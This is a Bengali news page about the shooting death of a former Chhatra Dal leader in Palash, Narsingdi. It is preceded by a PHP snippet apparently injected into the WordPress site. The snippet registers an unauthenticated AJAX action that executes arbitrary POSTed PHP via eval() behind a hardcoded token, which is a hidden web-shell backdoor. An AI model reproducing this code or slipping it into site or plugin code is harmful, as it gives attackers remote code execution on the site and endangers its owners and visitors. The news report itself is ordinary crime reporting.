// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== নরসিংদীতে গুলিবিদ্ধ সাবেক ছাত্রদল নেতার মৃত্যু | potrikaybangladesh.com
Thursday, October 1, 2026
Homeঅপরাধনরসিংদীতে গুলিবিদ্ধ সাবেক ছাত্রদল নেতার মৃত্যু

নরসিংদীতে গুলিবিদ্ধ সাবেক ছাত্রদল নেতার মৃত্যু

নরসিংদীর পলাশে আধিপত্য বিস্তারকে কেন্দ্র করে প্রতিপক্ষের হামলায় গুলিবিদ্ধ সাবেক ছাত্রদল নেতা ইব্রাহিম আল মাসুমের মৃত্যু হয়েছে।

ঢাকার একটি বেসরকারি হাসপাতালে নয় দিন চিকিৎসাধীন থাকার পর আজ সোমবার সকালে তিনি মারা যান।

নিহত ইব্রাহিম আল মাসুম ডাঙ্গা ইউনিয়নের হাসনহাটা গ্রামের মমিন হাজীর ছেলে। তিনি ডাঙ্গা ইউনিয়ন ছাত্রদলের সাবেক যুগ্ম সম্পাদক ছিলেন।

পলাশ থানার ভারপ্রাপ্ত কর্মকর্তা (ওসি) শাহেদ আল-মামুন দ্য ডেইলি স্টারকে এসব তথ্য নিশ্চিত করেছেন।

তিনি বলেন, এ ঘটনায় মাসুমের বোনজামাতা বাদী হয়ে পলাশ থানায় ৩৭ জনের নাম উল্লেখ করে মামলা করেছেন। জড়িতদের গ্রেপ্তারে অভিযান চলছে।

মামলার এজহার অনুযায়ী, ফকিরবাড়ি এলাকার বিজয়, সবুজ, ইকবাল ও সানির সঙ্গে একই এলাকার মাসুম, মামুন ও জয়নাল আবেদীনের আধিপত্য বিস্তার নিয়ে দীর্ঘদিনের বিরোধ ছিল।

এর জেরে গত ১ আগস্ট রাতে হাসনহাটা গ্রামের ফকিরবাড়ি এলাকায় একটি মুদি দোকানে বসে থাকা মাসুম, মামুন, জয়নালসহ কয়েকজনের ওপর প্রতিপক্ষ হামলা চালায়। এ সময় গুলি ছোড়া হলে মাসুমের পেটে লাগে।

পুলিশ জানায়, হামলা ঠেকাতে গেলে ডাঙ্গা ইউনিয়ন স্বেচ্ছাসেবক দলের সভাপতি মামুন আহমেদ, সাধারণ সম্পাদক জয়নাল আবেদীনসহ অন্তত ১০ জন আহত হন।

আহতদের প্রথমে ঢাকা মেডিকেল কলেজ হাসপাতালে নেওয়া হয়। পরে মাসুমকে ঢাকার একটি বেসরকারি হাসপাতালে স্থানান্তর করা হয়।

ওসি শাহেদ আল-মামুন বলেন, মাসুমের মৃত্যুকে কেন্দ্র করে যাতে কোনো অপ্রীতিকর ঘটনা না ঘটে, সে জন্য এলাকায় পুলিশ সতর্ক অবস্থানে রয়েছে।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments